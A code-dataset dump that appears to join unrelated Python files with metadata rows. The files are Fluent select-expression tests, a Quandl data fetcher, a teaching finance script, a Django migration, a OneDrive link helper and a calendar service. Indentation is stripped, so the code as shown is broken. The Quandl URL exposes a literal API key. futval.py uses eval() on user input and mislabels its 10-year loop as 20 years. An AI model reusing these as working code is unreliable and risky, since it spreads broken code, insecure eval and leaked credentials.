def test_with_argument_expression(self):
bundle = FluentBundle.from_string(
"en-US",
dedent_ftl(
"""
foo = { $arg ->
[a] A
*[b] B
}
"""
),
)
val, errs = bundle.format("foo", {"arg": "a"})
self.assertEqual(val, "A")
def test_string_selector_with_plural_categories(self):
bundle = FluentBundle.from_string(
"en-US",
dedent_ftl(
"""
foo = { $arg ->
[something] A
*[other] B
}
"""
),
)
# Even though 'other' matches a CLDR plural, this is not a plural
# category match, and should work without errors when we pass
# a string.
val, errs = bundle.format("foo", {"arg": "something"})
self.assertEqual(val, "A")
self.assertEqual(errs, [])
val2, errs2 = bundle.format("foo", {"arg": "other"})
self.assertEqual(val2, "B")
self.assertEqual(errs2, [])
val3, errs3 = bundle.format("foo", {"arg": "not listed"})
self.assertEqual(val3, "B")
self.assertEqual(errs3, [])
class TestSelectExpressionWithNumbers(unittest.TestCase):
def setUp(self):
self.bundle = FluentBundle.from_string(
"en-US",
dedent_ftl(
"""
foo = { 1 ->
*[0] A
[1] B
}
bar = { 2 ->
*[0] A
[1] B
}
baz = { $num ->
*[0] A
[1] B
}
qux = { 1.0 ->
*[0] A
[1] B
}
"""
),
use_isolating=False,
)
def test_selects_the_right_variant(self):
val, errs = self.bundle.format("foo", {})
self.assertEqual(val, "B")
self.assertEqual(errs, [])
def test_with_a_non_matching_selector(self):
val, errs = self.bundle.format("bar", {})
self.assertEqual(val, "A")
self.assertEqual(errs, [])
def test_with_a_missing_selector(self):
val, errs = self.bundle.format("baz", {})
self.assertEqual(val, "A")
self.assertEqual(errs, [FluentReferenceError("<string>:12:9: Unknown external: num")])
def test_with_argument_int(self):
val, errs = self.bundle.format("baz", {"num": 1})
self.assertEqual(val, "B")
def test_with_argument_float(self):
val, errs = self.bundle.format("baz", {"num": 1.0})
self.assertEqual(val, "B")
def test_with_float(self):
val, errs = self.bundle.format("qux", {})
self.assertEqual(val, "B")
class TestSelectExpressionWithPlaceables(unittest.TestCase):
def test_external_arguments_in_variants(self):
# We are testing several things:
# - that [b] variant doesn't trigger 'Unknown external: arg'
# - some logic in compiler implementation regarding when variables are looked up,
# so that [a] and [c] variants both can find 'arg'.
bundle = FluentBundle.from_string(
"en-US",
dedent_ftl(
"""
foo = { $lookup ->
[a] { $arg }
[b] B
*[c] { $arg }
}
"""
),
)
# No args:
val1, errs1 = bundle.format("foo", {})
self.assertEqual(val1, "arg")
self.assertEqual(
errs1,
[
FluentReferenceError("<string>:2:9: Unknown external: lookup"),
FluentReferenceError("<string>:5:15: Unknown external: arg"),
],
)
# [a] branch, arg supplied
val2, errs2 = bundle.format("foo", {"lookup": "a", "arg": "A"})
self.assertEqual(val2, "A")
self.assertEqual(errs2, [])
# [a] branch, arg not supplied
val3, errs3 = bundle.format("foo", {"lookup": "a"})
self.assertEqual(val3, "arg")
self.assertEqual(errs3, [FluentReferenceError("<string>:3:15: Unknown external: arg")])
# [b] branch
val4, errs4 = bundle.format("foo", {"lookup": "b"})
self.assertEqual(val4, "B")
self.assertEqual(errs4, [])
# [c] branch, arg supplied
val5, errs5 = bundle.format("foo", {"lookup": "c", "arg": "C"})
self.assertEqual(val5, "C")
self.assertEqual(errs5, [])
# [c] branch, arg not supplied
val6, errs6 = bundle.format("foo", {"lookup": "c"})
self.assertEqual(val6, "arg")
self.assertEqual(errs6, [FluentReferenceError("<string>:5:15: Unknown external: arg")])
class TestSelectExpressionWithPluralCategories(unittest.TestCase):
def setUp(self):
self.bundle = FluentBundle.from_string(
"en-US",
dedent_ftl(
"""
foo = { 1 ->
[one] A
*[other] B
}
foo-arg = { $count ->
[one] A
*[other] B
}
bar = { 1 ->
[1] A
*[other] B
}
bar-arg = { $count ->
[1] A
*[other] B
}
baz = { "not a number" ->
[one] A
*[other] B
}
baz-arg = { $count ->
[one] A
*[other] B
}
qux = { 1.0 ->
[1] A
*[other] B
}
"""
),
use_isolating=False,
)
def test_selects_the_right_category_with_integer_static(self):
val, errs = self.bundle.format("foo", {})
self.assertEqual(val, "A")
self.assertEqual(errs, [])
def test_selects_the_right_category_with_integer_runtime(self):
val, errs = self.bundle.format("foo-arg", {"count": 1})
self.assertEqual(val, "A")
self.assertEqual(errs, [])
val, errs = self.bundle.format("foo-arg", {"count": 2})
self.assertEqual(val, "B")
self.assertEqual(errs, [])
def test_selects_the_right_category_with_float_static(self):
val, errs = self.bundle.format("qux", {})
self.assertEqual(val, "A")
self.assertEqual(errs, [])
def test_selects_the_right_category_with_float_runtime(self):
val, errs = self.bundle.format("foo-arg", {"count": 1.0})
self.assertEqual(val, "A")
self.assertEqual(errs, [])
def test_selects_exact_match_static(self):
val, errs = self.bundle.format("bar", {})
self.assertEqual(val, "A")
self.assertEqual(errs, [])
def test_selects_exact_match_runtime(self):
val, errs = self.bundle.format("bar-arg", {"count": 1})
self.assertEqual(val, "A")
self.assertEqual(errs, [])
def test_selects_default_with_invalid_selector_static(self):
val, errs = self.bundle.format("baz", {})
self.assertEqual(val, "B")
self.assertEqual(errs, [])
def test_selects_default_with_invalid_selector_runtime(self):
val, errs = self.bundle.format("baz-arg", {"count": "not a number"})
self.assertEqual(val, "B")
self.assertEqual(errs, [])
def test_with_a_missing_selector(self):
val, errs = self.bundle.format("foo-arg", {})
self.assertEqual(val, "B")
self.assertEqual(errs, [FluentReferenceError("<string>:7:13: Unknown external: count")])
class TestSelectExpressionWithTerms(unittest.TestCase):
def setUp(self):
self.bundle = FluentBundle.from_string(
"en-US",
dedent_ftl(
"""
-my-term = term
.attr = termattribute
ref-term-attr = { -my-term.attr ->
[termattribute] Term Attribute
*[other] Other
}
ref-term-attr-other = { -my-term.attr ->
[x] Term Attribute
*[other] Other
}
ref-term-attr-missing = { -my-term.missing ->
[x] Term Attribute
*[other] Other
}
"""
),
use_isolating=False,
)
def test_ref_term_attribute(self):
val, errs = self.bundle.format("ref-term-attr")
self.assertEqual(val, "Term Attribute")
self.assertEqual(errs, [])
def test_ref_term_attribute_fallback(self):
val, errs = self.bundle.format("ref-term-attr-other")
self.assertEqual(val, "Other")
self.assertEqual(errs, [])
def test_ref_term_attribute_missing(self):
val, errs = self.bundle.format("ref-term-attr-missing")
self.assertEqual(val, "Other")
self.assertEqual(len(errs), 1)
self.assertEqual(
errs,
[FluentReferenceError("<string>:15:27: Unknown attribute: -my-term.missing")],
)
| UTF-8 | Python | false | false | 10,567 | py | 52 | test_select_expression.py | 27 | 0.484243 | 0.476389 | 0 | 356 | 28.682584 | 96 |
liu1355/dl_fin | 12,635,793,796,241 | bc31876bec4a1f84a877f225375264a83ad938b1 | b3ab292901144ba5b3256116e314fb9d6b776252 | /DDQN/FRED/a23.py | dcfb46b76cd5d6b794da660389a0fe56da2e13f0 | [
"MIT"
] | permissive | https://github.com/liu1355/dl_fin | 10e6b6fb8624e97894f37928b25ebebb144780cf | 9a4be858127be0daa96cc8bb5cfed9d14f7912b8 | refs/heads/master | "2021-05-06T06:00:03.196560" | "2017-12-31T08:53:58" | "2017-12-31T08:53:58" | 115,273,497 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import csv
import requests
import pandas as pd
FRED_NROUST = 'https://www.quandl.com/api/v3/datasets/FRED/NROUST/data.csv?api_key=6CbgFEPrywyyFy1yNywC'
with requests.Session() as s:
download = s.get(FRED_NROUST)
decoded_content = download.content.decode('utf-8')
cr = csv.reader(decoded_content.splitlines(), delimiter = ',')
NROUST_list = list(cr)
for row in NROUST_list:
print(row)
NROUST_list = pd.DataFrame(NROUST_list)
NROUST_list.to_csv('a23.csv', encoding = 'utf-8')
| UTF-8 | Python | false | false | 507 | py | 32 | a23.py | 31 | 0.700197 | 0.686391 | 0 | 18 | 27.166667 | 104 |
rambokiller/PythonProgramming | 5,669,356,880,980 | 780beae5d7958c86af8ecae002031b4e71a3a011 | b61849c7d7ff5505c0c895fe92b4740d6dd63add | /futval.py | 00cf65c67a2e96e9254b2e7d10e0ec022191ab2d | [] | no_license | https://github.com/rambokiller/PythonProgramming | c3ca2ec209f404527f509e8113c6904c58e2e23e | 26fd562aba10769a43ba09a9cf0b28b8200a6e1a | refs/heads/master | "2021-01-10T05:38:34.410666" | "2016-02-20T04:43:23" | "2016-02-20T04:43:23" | 52,028,135 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
# A program to compute the value of an investment carried
# 10 years into the future
def main():
print("This program calculates the future value", end=" ")
print("of a 20-year investment.")
principal =eval(input("Enter the initial principal: "))
apr = eval(input("Enter the annual interest rate: "))/100
for i in range(10):
principal = principal * (1 + apr)
print("The value in 10 years is:", principal)
main()
| UTF-8 | Python | false | false | 451 | py | 8 | futval.py | 8 | 0.689579 | 0.660754 | 0 | 17 | 25.529412 | 59 |
zdf0221/wireless | 19,396,072,330,161 | 50a24a990a996f2ff63b44bd771f24be24b3fa13 | 73f965c69c001044e8d1ad9d40b12b1a4c87409c | /managesys/migrations/0008_account.py | da5651d6b034ca3c3af2f0cb4d24918d716ae7da | [] | no_license | https://github.com/zdf0221/wireless | 6175104dac356b784fec3bef582b17e29c961b17 | d1c801854b1c3bd033e67f5e6461f77816e57fef | refs/heads/master | "2021-01-10T23:45:35.088530" | "2016-10-09T15:38:08" | "2016-10-09T15:38:08" | 70,407,267 | 3 | 0 | null | false | "2016-10-09T15:38:10" | "2016-10-09T14:10:11" | "2016-10-09T14:14:31" | "2016-10-09T15:38:09" | 2,407 | 0 | 0 | 0 | Python | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-27 09:38
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('managesys', '0007_delete_account'),
]
operations = [
migrations.CreateModel(
name='account',
fields=[
('accountNumber', models.CharField(max_length=15, primary_key=True, serialize=False)),
('accountType', models.CharField(max_length=50)),
('accountFee', models.CharField(max_length=50)),
('username', models.CharField(max_length=20)),
('id', models.CharField(max_length=20)),
('balance', models.FloatField(max_length=20)),
('status', models.CharField(max_length=20)),
],
),
]
| UTF-8 | Python | false | false | 879 | py | 37 | 0008_account.py | 29 | 0.564278 | 0.525597 | 0 | 27 | 31.555556 | 102 |
rajunrosco/PythonExperiments | 15,144,054,707,093 | f6c5c8492012bf4f5e60ffee0fdd266dbb6d338c | 90b03c0a5ce3088ea704ced246112530a2a5cfb0 | /OneDriveTEST/OneDrive.py | 2631a89e693146e6a34657a78dba1aa25e12a1fc | [] | no_license | https://github.com/rajunrosco/PythonExperiments | f567aceb287489dd5ba98a5d633d75a19b7d6726 | 702f1b0515708021d9170eff7cb199b43df53dd6 | refs/heads/master | "2023-01-12T09:48:04.140653" | "2022-02-05T06:47:02" | "2022-02-05T06:47:02" | 141,531,586 | 0 | 0 | null | false | "2022-12-27T15:34:53" | "2018-07-19T06:04:45" | "2022-02-05T06:47:07" | "2022-12-27T15:34:51" | 7,378 | 0 | 0 | 7 | Python | false | false | import base64
def create_onedrive_directdownload (onedrive_link):
data_bytes64 = base64.b64encode(bytes(onedrive_link, 'utf-8'))
data_bytes64_String = data_bytes64.decode('utf-8').replace('/','_').replace('+','-').rstrip("=")
resultUrl = f"https://api.onedrive.com/v1.0/shares/u!{data_bytes64_String}/root/content"
return resultUrl
import pandas as pd
# Input any OneDrive URL
onedrive_url = "https://1drv.ms/x/s!AhnXJ-3UjJ5NgQzUCY5Hzbb8m8-j?e=SYKklv"
direct_download_url = create_onedrive_directdownload(onedrive_url)
print(direct_download_url)# Load Dataset to the Dataframe
df = pd.read_excel(direct_download_url)
istop =1
print(df.head())# Continue with your data analysis ... | UTF-8 | Python | false | false | 709 | py | 57 | OneDrive.py | 35 | 0.722144 | 0.686883 | 0 | 16 | 43.375 | 100 |
bartoszp32/arttest | 3,745,211,489,657 | 81d4452d6afac1f706fe81afac23091b3ad7bede | 65226f6ed8c2fb16188d7523e37b6b5d4027ddb8 | /arttest/logic/calendars.py | bf400ce266376ce82031ba74b62e51431258eb50 | [] | no_license | https://github.com/bartoszp32/arttest | a1eda9972bc82cda9ca500c64375ee3bb0b10444 | c029263bb4e6c691d0752df482cfeef104ab4940 | refs/heads/master | "2019-07-08T12:20:25.441470" | "2017-06-19T05:48:44" | "2017-06-19T05:48:44" | 88,907,729 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #-*- coding: utf-8 -*-
""" Module used for operations on calendar """
import logging
import calendar
import random
FIRST_DAY = calendar.MONDAY
LOG = logging.getLogger(__name__)
class CalendarService(object):
"""docstring for CalendarService"""
def __init__(self, request):
super(CalendarService, self).__init__()
self.request = request
self.data = []
def __getfromdata(self, num):
""" Gets from """
return next((day for day in self.data if day[0] == num), None)
def __evenday(self, daynum):
""" Function checks whether day is normal weekday and evens it if it's not """
day = self.__getfromdata(daynum)
if day is None:
raise Exception("Unkown day given with value NONE")
if day[1] > 4:
# If day is Saturday then decrement day otherwise increment
idx = day[0] - 1 if day[1] == 5 else day[0] + 1
return self.__getfromdata(idx)
else:
return day
def getmonthdays(self, month, year):
""" Gets days for specific combination of month/year """
cal = calendar.Calendar(FIRST_DAY)
self.data = [[item[0], item[1]] for item in cal.itermonthdays2(year, month)]
return self.data
def getwellformatted(self):
""" Gets formatted calendar for specific month/year """
rowcount = int(len(self.data)/7)
ret = []
for row in xrange(0, rowcount):
lst = [self.data[row * 7 + col] for col in xrange(0, 7)]
ret.append(lst)
return ret
def getwellformat(self, month, year):
""" Gets formatted calendar for specific month/year """
self.getmonthdays(month, year)
return self.getwellformatted()
def getdaysamount(self):
""" Counts amount of days in specifc month/year """
return len([day for day in self.data if day[0] > 0])
def getdayscount(self, month, year):
""" Counts amount of days in specifc month/year """
self.getmonthdays(month, year)
return self.getdaysamount()
def drawdayfromset(self, count):
""" Draws day from specific month """
result = []
end = self.getdaysamount() # last item
current = 1
daynum = 1
interval = int(end / count)
for idx in xrange(0, count):
# Try to obtain unique value for each item
day = None
while daynum == current or day is None:
daynum = random.randint(current, current + interval)
LOG.debug("Drawn day number: %s for iteration: %s", daynum, idx)
day = self.__evenday(daynum)
result.append(day)
current = daynum
return result
def drawday(self, month, year, count):
""" Draws day from specific month """
self.getmonthdays(month, year)
return self.drawdayfromset(count)
| UTF-8 | Python | false | false | 2,920 | py | 108 | calendars.py | 52 | 0.585274 | 0.577397 | 0 | 75 | 37.933333 | 86 |